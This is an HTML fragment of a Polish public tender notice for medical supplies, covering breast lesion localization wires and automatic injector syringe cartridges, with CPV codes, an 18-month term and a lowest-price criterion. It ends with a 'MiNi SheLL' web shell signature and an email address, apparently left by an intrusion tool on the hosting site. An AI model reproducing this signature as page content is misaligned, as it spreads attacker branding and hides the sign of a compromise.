<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w Części nr 3 są kotwiczki lokalizacyjne do zmian w piersi używane do przedoperacyjnego oznaczania niewyczuwalnych dotykowo zmian w piersi. Pojawienie się błyszczącego znacznika referencyjnego na drucie z kotwiczką poza rdzeniem igły gwarantuje, że podczas manipulowania kotwiczka znajduje się wewnątrz igły. Wzmocniona końcówka kotwiczki (w zmodyfikowanych igłach) służy chirurgowi podczas zabiegu jako wizualny i dotykowy odnośnik odległości do zmiany i zmniejsza ryzyko oderwania kotwiczki.
Średnica 20G, 21G; długość od 5 do 15cm.
Opis potrzeb zamawiającego zawierający orientacyjne ilości dostaw w okresie objętym zamówieniem został zawarty w Załączniku nr 8 - Formularzu cenowo - ofertowym do Części nr 3 będącym  integralną częścią SIWZ. Zakres zamówienia obejmuje dostawę przedmiotów zamówienia w ilościach wyszczególnionych w Formularzu cenowo - ofertowym, będącym integralną częścią SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.35.41.10-3, 33.16.95.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wkłady do strzykawki automatycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wkłady do strzykawki automatycznej,  poj. 200 ml. Wkłady do strzykawki automatycznej muszą być, kompatybilne z posiadanym przez Zamawiającego wstrzykiwaczem.
Opis potrzeb zamawiającego zawierający orientacyjne ilości dostaw w okresie objętym zamówieniem został zawarty w Załączniku nr 8 - Formularzu cenowo - ofertowym do Części nr 4 będącym  integralną częścią SIWZ. Zakres zamówienia obejmuje dostawę przedmiotów zamówienia w ilościach wyszczególnionych w Formularzu cenowo - ofertowym, będącym integralną częścią SIWZ. Dopuszcza się składanie ofert równoważnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.35.41.10-3, 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com